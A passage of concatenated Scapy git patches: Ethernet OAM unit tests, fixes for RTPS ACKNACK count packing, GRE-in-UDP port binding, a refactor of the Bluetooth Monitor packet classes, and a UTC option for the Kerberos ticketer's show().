pkt[OAM].tlvs[0].length == 16 +assert pkt[OAM].tlvs[0].last_egress_id == 1 +assert pkt[OAM].tlvs[0].next_egress_id == 2 +assert pkt[OAM].tlvs[1].type == 8 +assert pkt[OAM].tlvs[1].length == 16 +assert pkt[OAM].tlvs[1].last_egress_id == 3 +assert pkt[OAM].tlvs[1].next_egress_id == 4 +assert pkt[OAM].tlvs[2].type == 5 +assert pkt[OAM].tlvs[2].length == 7 +assert pkt[OAM].tlvs[2].ingress_act == 1 +assert pkt[OAM].tlvs[2].ingress_mac == "12:34:56:78:90:11" +assert pkt[OAM].tlvs[3].type == 5 +assert pkt[OAM].tlvs[3].length == 7 +assert pkt[OAM].tlvs[3].ingress_act == 6 +assert pkt[OAM].tlvs[3].ingress_mac == "12:34:56:78:90:22" +assert pkt[OAM].tlvs[4].type == 6 +assert pkt[OAM].tlvs[4].length == 7 +assert pkt[OAM].tlvs[4].egress_act == 2 +assert pkt[OAM].tlvs[4].egress_mac == "12:34:56:78:90:33" +assert pkt[OAM].tlvs[5].type == 6 +assert pkt[OAM].tlvs[5].length == 7 +assert pkt[OAM].tlvs[5].egress_act == 3 +assert pkt[OAM].tlvs[5].egress_mac == "12:34:56:78:90:44" + +check_tshark(pkt, "(LTR)") + += AIS + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Alarm Indication Signal (AIS)", + period="1 frame per second"))) + +assert pkt[OAM].opcode == 33 +assert pkt[OAM].tlv_offset == 0 +assert pkt[OAM].period == 0b100 + +check_tshark(pkt, "(AIS)") + += LCK + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Lock Signal (LCK)", + period="1 frame per second"))) + +assert pkt[OAM].opcode == 35 +assert pkt[OAM].tlv_offset == 0 +assert pkt[OAM].period == 0b100 + +check_tshark(pkt, "(LCK)") + += TST + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Test Signal (TST)", + seq_num=15, + tlvs=[OAM_TEST_TLV(pat_type="Null signal without CRC-32")/Raw(b'123'), + OAM_TEST_TLV(pat_type="Null signal without CRC-32")/Raw(b'23456'), + OAM_TEST_TLV(pat_type="Null signal with CRC-32")/Raw(b'123'), + OAM_TEST_TLV(pat_type="Null signal with CRC-32")/Raw(b'23456'), + OAM_TEST_TLV(pat_type="PRBS 2^-31 - 1 without CRC-32")/Raw(b'123'), + OAM_TEST_TLV(pat_type="PRBS 2^-31 - 1 without CRC-32")/Raw(b'23456'), + OAM_TEST_TLV(pat_type="PRBS 2^-31 - 1 with CRC-32")/Raw(b'123'), + OAM_TEST_TLV(pat_type="PRBS 2^-31 - 1 with CRC-32")/Raw(b'23456')]))) + +assert pkt[OAM].opcode == 37 +assert pkt[OAM].tlv_offset == 4 +assert pkt[OAM].seq_num == 15 + +assert pkt[OAM].tlvs[0].type == 32 +assert pkt[OAM].tlvs[0].length == 4 +assert pkt[OAM].tlvs[0].pat_type == 0 +assert raw(pkt[OAM].tlvs[0].payload) == b'123' +assert pkt[OAM].tlvs[1].type == 32 +assert pkt[OAM].tlvs[1].length == 6 +assert pkt[OAM].tlvs[1].pat_type == 0 +assert raw(pkt[OAM].tlvs[1].payload) == b'23456' +assert pkt[OAM].tlvs[2].type == 32 +assert pkt[OAM].tlvs[2].length == 8 +assert pkt[OAM].tlvs[2].pat_type == 1 +assert raw(pkt[OAM].tlvs[2].payload) == b'123' +assert pkt[OAM].tlvs[2].crc == crc32(raw(pkt[OAM].tlvs[2])[:-4]) % (1 << 32) +assert pkt[OAM].tlvs[3].type == 32 +assert pkt[OAM].tlvs[3].length == 10 +assert pkt[OAM].tlvs[3].pat_type == 1 +assert raw(pkt[OAM].tlvs[3].payload) == b'23456' +assert pkt[OAM].tlvs[3].crc == crc32(raw(pkt[OAM].tlvs[3])[:-4]) % (1 << 32) +assert pkt[OAM].tlvs[4].type == 32 +assert pkt[OAM].tlvs[4].length == 4 +assert pkt[OAM].tlvs[4].pat_type == 2 +assert raw(pkt[OAM].tlvs[4].payload) == b'123' +assert pkt[OAM].tlvs[5].type == 32 +assert pkt[OAM].tlvs[5].length == 6 +assert pkt[OAM].tlvs[5].pat_type == 2 +assert raw(pkt[OAM].tlvs[5].payload) == b'23456' +assert pkt[OAM].tlvs[6].type == 32 +assert pkt[OAM].tlvs[6].length == 8 +assert pkt[OAM].tlvs[6].pat_type == 3 +assert raw(pkt[OAM].tlvs[6].payload) == b'123' +assert pkt[OAM].tlvs[6].crc == crc32(raw(pkt[OAM].tlvs[6])[:-4]) % (1 << 32) +assert pkt[OAM].tlvs[7].type == 32 +assert pkt[OAM].tlvs[7].length == 10 +assert pkt[OAM].tlvs[7].pat_type == 3 +assert raw(pkt[OAM].tlvs[7].payload) == b'23456' +assert pkt[OAM].tlvs[7].crc == crc32(raw(pkt[OAM].tlvs[7])[:-4]) % (1 << 32) + +check_tshark(pkt, "(TST)") + += APS + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Automatic Protection Switching (APS)", + aps=APS(req_st="Forced switch (FS)", + prot_type="A+B+R", + req_sig="Normal traffic", + br_sig="Null signal", + br_type="T")))) + +assert pkt[OAM].opcode == 39 +assert pkt[APS].req_st == 0b1101 +assert pkt[APS].prot_type.A == True +assert pkt[APS].prot_type.B == True +assert pkt[APS].prot_type.R == True +assert pkt[APS].prot_type == 0b1101 +assert pkt[APS].req_sig == 1 +assert pkt[APS].br_sig == 0 +assert pkt[APS].br_type.T == True +assert pkt[APS].br_type == (1 << 7) + +check_tshark(pkt, "(APS)") + += RAPS + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Ring-Automatic Protection Switching (R-APS)", + raps=RAPS(req_st="Event", + sub_code="Flush", + status="RB+BPR", + node_id="12:12:12:23:23:23")))) + +assert pkt[OAM].opcode == 40 +assert pkt[RAPS].req_st == 0b1110 +assert pkt[RAPS].sub_code == 0b0000 +assert pkt[RAPS].status.RB == True +assert pkt[RAPS].status.DNF == False +assert pkt[RAPS].status.BPR == True +assert pkt[RAPS].status == (1 << 7) | (1 << 5) +assert pkt[RAPS].node_id == "12:12:12:23:23:23" + +check_tshark(pkt, "(R-APS)") + += MCC + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Maintenance Communication Channel (MCC)", + oui=12, + subopcode=2))) + +assert pkt[OAM].opcode == 41 +assert pkt[OAM].oui == 12 +assert pkt[OAM].subopcode == 2 + +check_tshark(pkt, "(MCC)") + += LMM + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Loss Measurement Message (LMM)", + flags="Proactive", + txfcf=1, + rxfcf=2, + txfcb=3))) + +assert pkt[OAM].opcode == 43 +assert pkt[OAM].version == 1 +assert pkt[OAM].tlv_offset == 12 +assert pkt[OAM].flags == 1 +assert pkt[OAM].flags.Proactive == True +assert pkt[OAM].txfcf == 1 +assert pkt[OAM].rxfcf == 2 +assert pkt[OAM].txfcb == 3 + +check_tshark(pkt, "(LMM)") + += LMR + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Loss Measurement Reply (LMR)", + txfcf=1, + rxfcf=2, + txfcb=3))) + +assert pkt[OAM].opcode == 42 +assert pkt[OAM].txfcf == 1 +assert pkt[OAM].rxfcf == 2 +assert pkt[OAM].txfcb == 3 + +check_tshark(pkt, "(LMR)") + += 1DM + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="One Way Delay Measurement (1DM)", + txtsf=PTP_TIMESTAMP(seconds=1, nanoseconds=2), + rxtsf=PTP_TIMESTAMP(seconds=3, nanoseconds=4), + tlvs=[OAM_DATA_TLV()/Raw(b'123'), + OAM_DATA_TLV()/Raw(b'456789'), + OAM_TEST_ID_TLV(test_id=5)]))) + +assert pkt[OAM].opcode == 45 +assert pkt[OAM].version == 1 +assert pkt[OAM].tlv_offset == 16 +assert pkt[OAM].txtsf.seconds == 1 +assert pkt[OAM].txtsf.nanoseconds == 2 +assert pkt[OAM].rxtsf.seconds == 3 +assert pkt[OAM].rxtsf.nanoseconds == 4 +assert pkt[OAM].tlvs[0].type == 3 +assert pkt[OAM].tlvs[0].length == 3 +assert raw(pkt[OAM].tlvs[0].payload) == b'123' +assert pkt[OAM].tlvs[1].type == 3 +assert pkt[OAM].tlvs[1].length == 6 +assert raw(pkt[OAM].tlvs[1].payload) == b'456789' +assert pkt[OAM].tlvs[2].type == 36 +assert pkt[OAM].tlvs[2].length == 32 +assert pkt[OAM].tlvs[2].test_id == 5 + +# FIXME: for some reason wireshark does not like OAM_TEST_ID_TLV here +check_tshark(pkt, "(1DM)") + += DMM + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Delay Measurement Message (DMM)", + txtsf=PTP_TIMESTAMP(seconds=1, nanoseconds=2), + txtsb=PTP_TIMESTAMP(seconds=2, nanoseconds=1), + rxtsf=PTP_TIMESTAMP(seconds=3, nanoseconds=4), + rxtsb=PTP_TIMESTAMP(seconds=6, nanoseconds=5), + tlvs=[OAM_DATA_TLV()/Raw(b'123'), + OAM_DATA_TLV()/Raw(b'456789'), + OAM_TEST_ID_TLV(test_id=5)]))) + +assert pkt[OAM].opcode == 47 +assert pkt[OAM].version == 1 +assert pkt[OAM].tlv_offset == 32 +assert pkt[OAM].txtsf.seconds == 1 +assert pkt[OAM].txtsf.nanoseconds == 2 +assert pkt[OAM].rxtsf.seconds == 3 +assert pkt[OAM].rxtsf.nanoseconds == 4 +assert pkt[OAM].txtsb.seconds == 2 +assert pkt[OAM].txtsb.nanoseconds == 1 +assert pkt[OAM].rxtsb.seconds == 6 +assert pkt[OAM].rxtsb.nanoseconds == 5 +assert pkt[OAM].tlvs[0].type == 3 +assert pkt[OAM].tlvs[0].length == 3 +assert raw(pkt[OAM].tlvs[0].payload) == b'123' +assert pkt[OAM].tlvs[1].type == 3 +assert pkt[OAM].tlvs[1].length == 6 +assert raw(pkt[OAM].tlvs[1].payload) == b'456789' +assert pkt[OAM].tlvs[2].type == 36 +assert pkt[OAM].tlvs[2].length == 32 +assert pkt[OAM].tlvs[2].test_id == 5 + +# FIXME: for some reason wireshark does not like OAM_TEST_ID_TLV here +check_tshark(pkt, "(DMM)") + += EXM + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Experimental OAM Message (EXM)", + oui=123, + subopcode=33))) + +assert pkt[OAM].opcode == 49 +assert pkt[OAM].oui == 123 +assert pkt[OAM].subopcode == 33 + +check_tshark(pkt, "(EXM)") + += EXR + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Experimental OAM Reply (EXR)", + oui=123, + subopcode=33))) + +assert pkt[OAM].opcode == 48 +assert pkt[OAM].oui == 123 +assert pkt[OAM].subopcode == 33 + +check_tshark(pkt, "(EXR)") + += VSM + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Vendor Specific Message (VSM)", + oui=123, + subopcode=33))) + +assert pkt[OAM].opcode == 51 +assert pkt[OAM].oui == 123 +assert pkt[OAM].subopcode == 33 + +check_tshark(pkt, "(VSM)") + += CSF + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Client Signal Fail (CSF)", + flags="RDI", + period="1 frame per minute"))) + +assert pkt[OAM].opcode == 52 +assert pkt[OAM].tlv_offset == 0 +assert pkt[OAM].flags == 0b010 +assert pkt[OAM].period == 0b110 + +check_tshark(pkt, "(CSF)") + += SLM + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Synthetic Loss Message (SLM)", + test_id=11, + src_mep_id=12, + rcv_mep_id=34, + txfcf=3, + txfcb=9, + tlvs=[OAM_DATA_TLV()/Raw(b'123'), + OAM_DATA_TLV()/Raw(b'456789')]))) + +assert pkt[OAM].opcode == 55 +assert pkt[OAM].tlv_offset == 16 +assert pkt[OAM].test_id == 11 +assert pkt[OAM].src_mep_id == 12 +assert pkt[OAM].rcv_mep_id == 34 +assert pkt[OAM].txfcf == 3 +assert pkt[OAM].txfcb == 9 +assert pkt[OAM].tlvs[0].type == 3 +assert pkt[OAM].tlvs[0].length == 3 +assert raw(pkt[OAM].tlvs[0].payload) == b'123' +assert pkt[OAM].tlvs[1].type == 3 +assert pkt[OAM].tlvs[1].length == 6 +assert raw(pkt[OAM].tlvs[1].payload) == b'456789' + +check_tshark(pkt, "(SLM)") + += SLR + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Synthetic Loss Reply (SLR)", + test_id=11, + src_mep_id=12, + rcv_mep_id=34, + txfcf=3, + txfcb=9, + tlvs=[OAM_DATA_TLV()/Raw(b'123'), + OAM_DATA_TLV()/Raw(b'456789')]))) + +assert pkt[OAM].opcode == 54 +assert pkt[OAM].tlv_offset == 16 +assert pkt[OAM].test_id == 11 +assert pkt[OAM].src_mep_id == 12 +assert pkt[OAM].rcv_mep_id == 34 +assert pkt[OAM].txfcf == 3 +assert pkt[OAM].txfcb == 9 +assert pkt[OAM].tlvs[0].type == 3 +assert pkt[OAM].tlvs[0].length == 3 +assert raw(pkt[OAM].tlvs[0].payload) == b'123' +assert pkt[OAM].tlvs[1].type == 3 +assert pkt[OAM].tlvs[1].length == 6 +assert raw(pkt[OAM].tlvs[1].payload) == b'456789' + +check_tshark(pkt, "(SLR)") + += 1SL + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="One Way Synthetic Loss Measurement (1SL)", + test_id=11, + src_mep_id=12, + txfcf=3, + tlvs=[OAM_DATA_TLV()/Raw(b'123'), + OAM_DATA_TLV()/Raw(b'456789')]))) + +assert pkt[OAM].opcode == 53 +assert pkt[OAM].tlv_offset == 16 +assert pkt[OAM].test_id == 11 +assert pkt[OAM].src_mep_id == 12 +assert pkt[OAM].txfcf == 3 +assert pkt[OAM].tlvs[0].type == 3 +assert pkt[OAM].tlvs[0].length == 3 +assert raw(pkt[OAM].tlvs[0].payload) == b'123' +assert pkt[OAM].tlvs[1].type == 3 +assert pkt[OAM].tlvs[1].length == 6 +assert raw(pkt[OAM].tlvs[1].payload) == b'456789' + +check_tshark(pkt, "(1SL)") + += GNM + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Generic Notification Message (GNM)", + period="1 frame per minute", + nom_bdw=1, + curr_bdw=2, + port_id=3))) + +assert pkt[OAM].opcode == 32 +assert pkt[OAM].tlv_offset == 13 +assert pkt[OAM].period == 0b110 +assert pkt[OAM].subopcode == 1 +assert pkt[OAM].nom_bdw == 1 +assert pkt[OAM].curr_bdw == 2 +assert pkt[OAM].port_id == 3 + +check_tshark(pkt, "(GNM)") From 5b75126a8a45a82e738c0948b02cdbdd80c17773 Mon Sep 17 00:00:00 2001 From: Seulbae Kim Date: Tue, 6 Feb 2024 08:08:16 +0900 Subject: [PATCH 1189/1632] RTPS: Pack count field of ACKNACK submessage correctly (#3915) * Pack count field of ACKNACK submessage correctly The count field of ACKNACK submessage is an integer field and should be packed using the endianness flag, just like how the count field of HEARTBEAT submessage is handled. Currently, `count=1` is incorrectly packed as `"\x00\x00\x00\x01"` (== 16777216), regardless of the endianness bit. With this change, `count=1` is correctly packed as `"\x01\x00\x00\x00"` (== 1), given the endianness is set. * add a unit test Signed-off-by: Seulbae Kim --------- Signed-off-by: Seulbae Kim --- scapy/contrib/rtps/rtps.py | 3 ++- test/contrib/rtps.uts | 33 +++++++++++++++++++++++++++++++++ 2 files changed, 35 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/rtps/rtps.py b/scapy/contrib/rtps/rtps.py index 3edeebde508..134ff7c7b5a 100644 --- a/scapy/contrib/rtps/rtps.py +++ b/scapy/contrib/rtps/rtps.py @@ -351,7 +351,8 @@ class RTPSSubMessage_ACKNACK(EPacket): "readerSNState", 0, length_from=lambda pkt: pkt.octetsToNextHeader - 8 - 4 ), - XNBytesField("count", 0, 4), + EField(IntField("count", 0), + endianness_from=e_flags), ] diff --git a/test/contrib/rtps.uts b/test/contrib/rtps.uts index 9d2ae7b2889..50bb4b33612 100644 --- a/test/contrib/rtps.uts +++ b/test/contrib/rtps.uts @@ -443,3 +443,36 @@ p1 = RTPS( assert p0.build() == d assert p1.build() == d assert p0 == p1 + ++ Test for pr #3915 += RTPS ACKNACK count packing and dissection + +d = b"\x52\x54\x50\x53\x02\x02\x01\x0f\x01\x0f\x45\xd2\xb3\xf5\x58\xb9" \ + b"\x01\x00\x00\x00\x06\x03\x18\x00\x00\x00\x03\xc7\x00\x00\x03\xc2" \ + b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" +p0 = RTPS(d) + +p1 = RTPS( + protocolVersion=ProtocolVersionPacket(major=2, minor=2), + vendorId=VendorIdPacket(vendor_id=0x010f), + guidPrefix=GUIDPrefixPacket( + hostId=0x010f45d2, appId=0xb3f558b9, instanceId=0x01000000 + ), + magic=b"RTPS", +) / RTPSMessage( + submessages=[ + RTPSSubMessage_ACKNACK( + submessageId=6, + submessageFlags=3, + octetsToNextHeader=0x18, + reader_id=b'\x00\x00\x03\xc7', + writer_id=b'\x00\x00\x03\xc2', + readerSNState=b'\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00', + count=1 + ) + ] +) + +assert p0.build() == d +assert p1.build() == d +assert p0 == p1 From d2d76fc6a07e801df0abd21bb4205b0236dbd0e7 Mon Sep 17 00:00:00 2001 From: Alex Forencich Date: Mon, 5 Feb 2024 15:16:51 -0800 Subject: [PATCH 1190/1632] GRE-in-UDP uses port 4754 (see RFC 8086) (#4057) * GRE-in-UDP uses port 4754 (see RFC 8086) Signed-off-by: Alex Forencich * Add GRE layer binding tests Signed-off-by: Alex Forencich --------- Signed-off-by: Alex Forencich --- scapy/layers/inet.py | 1 + test/scapy/layers/inet.uts | 54 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 55 insertions(+) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index f46ed7f5e4e..694a496b662 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1089,6 +1089,7 @@ def mysummary(self): bind_layers(IP, TCP, frag=0, proto=6) bind_layers(IP, UDP, frag=0, proto=17) bind_layers(IP, GRE, frag=0, proto=47) +bind_layers(UDP, GRE, dport=4754) conf.l2types.register(DLT_RAW, IP) conf.l2types.register_num2layer(DLT_RAW_ALT, IP) diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index 5b98c1c74f3..18fdce0e262 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -595,6 +595,60 @@ with mock.patch("scapy.layers.l2.getmacbyip", side_effect=_err): except ValueError: pass += GRE binding tests + +* Test GRE-in-IP +pkt = Ether(raw(Ether()/IP()/GRE()/IP()/UDP())) +assert isinstance(pkt, Ether) +pkt = pkt.payload +assert isinstance(pkt, IP) and pkt.proto == 47 +pkt = pkt.payload +assert isinstance(pkt, GRE) and pkt.proto == 0x0800 +pkt = pkt.payload +assert isinstance(pkt, IP) +pkt = pkt.payload +assert isinstance(pkt, UDP) + +* Test GRE-in-IPv6 +pkt = Ether(raw(Ether()/IPv6()/GRE()/IPv6()/UDP())) +assert isinstance(pkt, Ether) +pkt = pkt.payload +assert isinstance(pkt, IPv6) and pkt.nh == 47 +pkt = pkt.payload +assert isinstance(pkt, GRE) and pkt.proto == 0x86dd +pkt = pkt.payload +assert isinstance(pkt, IPv6) +pkt = pkt.payload +assert isinstance(pkt, UDP) + +* Test GRE-in-UDP +pkt = Ether(raw(Ether()/IP()/UDP()/GRE()/IP()/UDP())) +assert isinstance(pkt, Ether) +pkt = pkt.payload +assert isinstance(pkt, IP) +pkt = pkt.payload +assert isinstance(pkt, UDP) and pkt.dport == 4754 +pkt = pkt.payload +assert isinstance(pkt, GRE) and pkt.proto == 0x0800 +pkt = pkt.payload +assert isinstance(pkt, IP) +pkt = pkt.payload +assert isinstance(pkt, UDP) + +* Test GRE-in-UDP (IPv6) +pkt = Ether(raw(Ether()/IPv6()/UDP()/GRE()/IPv6()/UDP())) +assert isinstance(pkt, Ether) +pkt = pkt.payload +assert isinstance(pkt, IPv6) +pkt = pkt.payload +assert isinstance(pkt, UDP) and pkt.dport == 4754 +pkt = pkt.payload +assert isinstance(pkt, GRE) and pkt.proto == 0x86dd +pkt = pkt.payload +assert isinstance(pkt, IPv6) +pkt = pkt.payload +assert isinstance(pkt, UDP) + ############ ############ + inet.py From eae1567b158a89dd9a1df4f707307f1da6ab56e3 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Tue, 6 Feb 2024 00:25:11 +0100 Subject: [PATCH 1191/1632] Bluetooth: refactor Bluetooth Monitor packets (#4091) * Add many Bluetooth Monitor packets * Restore HCI_MON in bluetooth.py --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/bluetooth.py | 115 ++++++++++++++++++++++++++------ test/scapy/layers/bluetooth.uts | 40 +++++++++-- 2 files changed, 129 insertions(+), 26 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 6c5656b23fc..4d2c1bd6d4a 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -46,6 +46,7 @@ StrField, StrFixedLenField, StrLenField, + StrNullField, UUIDField, XByteField, XLE3BytesField, @@ -196,24 +197,6 @@ class HCI_PHDR_Hdr(Packet): } -class BT_Mon_Hdr(Packet): - name = 'Bluetooth Linux Monitor Transport Header' - fields_desc = [ - LEShortField('opcode', None), - LEShortField('adapter_id', None), - LEShortField('len', None) - ] - - -# https://www.tcpdump.org/linktypes/LINKTYPE_BLUETOOTH_LINUX_MONITOR.html -class BT_Mon_Pcap_Hdr(BT_Mon_Hdr): - name = 'Bluetooth Linux Monitor Transport Pcap Header' - fields_desc = [ - ShortField('adapter_id', None), - ShortField('opcode', None) - ] - - class HCI_Hdr(Packet): name = "HCI header" fields_desc = [ByteEnumField("type", 2, _bluetooth_packet_types)] @@ -1889,7 +1872,6 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): conf.l2types.register(DLT_BLUETOOTH_HCI_H4, HCI_Hdr) conf.l2types.register(DLT_BLUETOOTH_HCI_H4_WITH_PHDR, HCI_PHDR_Hdr) -conf.l2types.register(DLT_BLUETOOTH_LINUX_MONITOR, BT_Mon_Pcap_Hdr) # 7.1 LINK CONTROL COMMANDS, the OGF is defined as 0x01 @@ -2084,6 +2066,97 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): bind_layers(SM_Hdr, SM_DHKey_Check, sm_command=0x0d) +############### +# HCI Monitor # +############### + + +# https://elixir.bootlin.com/linux/v6.4.2/source/include/net/bluetooth/hci_mon.h#L27 +class HCI_Mon_Hdr(Packet): + name = 'Bluetooth Linux Monitor Transport Header' + fields_desc = [ + LEShortEnumField('opcode', None, { + 0: "New index", + 1: "Delete index", + 2: "Command pkt", + 3: "Event pkt", + 4: "ACL TX pkt", + 5: "ACL RX pkt", + 6: "SCO TX pkt", + 7: "SCO RX pkt", + 8: "Open index", + 9: "Close index", + 10: "Index info", + 11: "Vendor diag", + 12: "System note", + 13: "User logging", + 14: "Ctrl open", + 15: "Ctrl close", + 16: "Ctrl command", + 17: "Ctrl event", + 18: "ISO TX pkt", + 19: "ISO RX pkt", + }), + LEShortField('adapter_id', None), + LEShortField('len', None) + ] + + +# https://www.tcpdump.org/linktypes/LINKTYPE_BLUETOOTH_LINUX_MONITOR.html +class HCI_Mon_Pcap_Hdr(HCI_Mon_Hdr): + name = 'Bluetooth Linux Monitor Transport Pcap Header' + fields_desc = [ + ShortField('adapter_id', None), + ShortField('opcode', None) + ] + + +class HCI_Mon_New_Index(Packet): + name = 'Bluetooth Linux Monitor Transport New Index Packet' + fields_desc = [ + ByteEnumField('bus', 0, { + 0x00: "BR/EDR", + 0x01: "AMP" + }), + ByteEnumField('type', 0, { + 0x00: "Virtual", + 0x01: "USB", + 0x02: "PC Card", + 0x03: "UART", + 0x04: "RS232", + 0x05: "PCI", + 0x06: "SDIO" + }), + LEMACField('addr', None), + StrFixedLenField('devname', None, 8) + ] + + +class HCI_Mon_Index_Info(Packet): + name = 'Bluetooth Linux Monitor Transport Index Info Packet' + fields_desc = [ + LEMACField('addr', None), + XLEShortField('manufacturer', None) + ] + + +class HCI_Mon_System_Note(Packet): + name = 'Bluetooth Linux Monitor Transport System Note Packet' + fields_desc = [ + StrNullField('note', None) + ] + + +# https://elixir.bootlin.com/linux/v6.4.2/source/include/net/bluetooth/hci_mon.h#L34 +bind_layers(HCI_Mon_Hdr, HCI_Mon_New_Index, opcode=0) +bind_layers(HCI_Mon_Hdr, HCI_Command_Hdr, opcode=2) +bind_layers(HCI_Mon_Hdr, HCI_Event_Hdr, opcode=3) +bind_layers(HCI_Mon_Hdr, HCI_Mon_Index_Info, opcode=10) +bind_layers(HCI_Mon_Hdr, HCI_Mon_System_Note, opcode=12) + +conf.l2types.register(DLT_BLUETOOTH_LINUX_MONITOR, HCI_Mon_Pcap_Hdr) + + ########### # Helpers # ########### @@ -2302,7 +2375,7 @@ def recv(self, x=MTU): class BluetoothMonitorSocket(_BluetoothLibcSocket): - desc = "read/write over a Bluetooth monitor channel" + desc = "Read/write over a Bluetooth monitor channel" def __init__(self): sa = sockaddr_hci() @@ -2316,7 +2389,7 @@ def __init__(self): sock_address=sa) def recv(self, x=MTU): - return BT_Mon_Hdr(self.ins.recv(x)) + return HCI_Mon_Hdr(self.ins.recv(x)) conf.BTsocket = BluetoothRFCommSocket diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index bcb207f031b..048c5f8b172 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -529,9 +529,39 @@ p = SM_Hdr(r) assert SM_DHKey_Check in p and p.dhkey_check[:5] == b"scapy" -= Bluetooth Monitor Pcap Header ++ HCIMon tests -p = BT_Mon_Pcap_Hdr(hex_bytes("00000008")) -assert BT_Mon_Pcap_Hdr in p -assert p[BT_Mon_Pcap_Hdr].adapter_id == 0 -assert p[BT_Mon_Pcap_Hdr].opcode == 8 += HCI_Mon - Bluetooth Monitor Pcap Header + +p = HCI_Mon_Pcap_Hdr(hex_bytes("00000008")) +assert HCI_Mon_Pcap_Hdr in p +assert p[HCI_Mon_Pcap_Hdr].adapter_id == 0 +assert p[HCI_Mon_Pcap_Hdr].opcode == 8 + += HCI_Mon - Bluetooth Monitor HCI_Mon_New_Index + +p = HCI_Mon_Pcap_Hdr(hex_bytes("0000000000030000109a81206863693000000000")) +assert HCI_Mon_New_Index in p +assert p[HCI_Mon_New_Index].bus == 0 +assert p[HCI_Mon_New_Index].type == 3 +assert p[HCI_Mon_New_Index].addr == '20:81:9a:10:00:00' +assert p[HCI_Mon_New_Index].devname.decode('utf-8').rstrip('\x00') == 'hci0' + += HCI_Mon - Bluetooth Monitor HCI_Mon_Delete_Index + +p = HCI_Mon_Pcap_Hdr(hex_bytes("00000001")) +assert HCI_Mon_Pcap_Hdr in p +assert p[HCI_Mon_Pcap_Hdr].opcode == 1 + += HCI_Mon - Bluetooth Monitor HCI_Mon_Index_Info + +p = HCI_Mon_Pcap_Hdr(hex_bytes("0000000a0000109a81203101")) +assert HCI_Mon_Index_Info in p +assert p[HCI_Mon_Index_Info].addr == '20:81:9a:10:00:00' +assert p[HCI_Mon_Index_Info].manufacturer == 0x131 + += HCI_Mon - Bluetooth Monitor HCI_Mon_System_Note + +p = HCI_Mon_Pcap_Hdr(hex_bytes("ffff000c426c7565746f6f74682073756273797374656d2076657273696f6e20322e323200")) +assert HCI_Mon_System_Note in p +assert p[HCI_Mon_System_Note].note == b'Bluetooth subsystem version 2.22' From ff968595ddec589f5e0be4acdaf6ae8b150c3136 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 5 Feb 2024 22:07:52 +0100 Subject: [PATCH 1192/1632] Fix show() on non-UTC Kerberos --- scapy/modules/ticketer.py | 7 +++++-- test/scapy/layers/kerberos.uts | 2 +- 2 files changed, 6 insertions(+), 3 deletions(-) diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index a9628f24b88..cc2f36d9666 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -368,7 +368,7 @@ def save(self, fname=None): with open(self.fname, "wb") as fd: return fd.write(bytes(self.ccache)) - def show(self): + def show(self, utc=False): """ Show the content of a CCache """ @@ -382,7 +382,10 @@ def _to_str(x): if x is None: return "None" else: - x = datetime.fromtimestamp(x) + x = datetime.fromtimestamp( + x, + tz=timezone.utc if utc else None + ) return x.strftime("%d/%m/%y %H:%M:%S") for i, cred in enumerate(self.ccache.credentials): diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index be9bff9aea6..120c20998d1 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -914,7 +914,7 @@ with mock.patch('scapy.libs.rfc3961.os.urandom', side_effect=fake_random): = Ticketer++ - Call show() with ContextManagerCaptureOutput() as cmco: - t.show() + t.show(utc=True) outp = cmco.get_output().strip() print(outp) From a0d2d9de9a529b13fc575f657a858443acf229cf Mon Sep 17 00:00:00 2001 From: 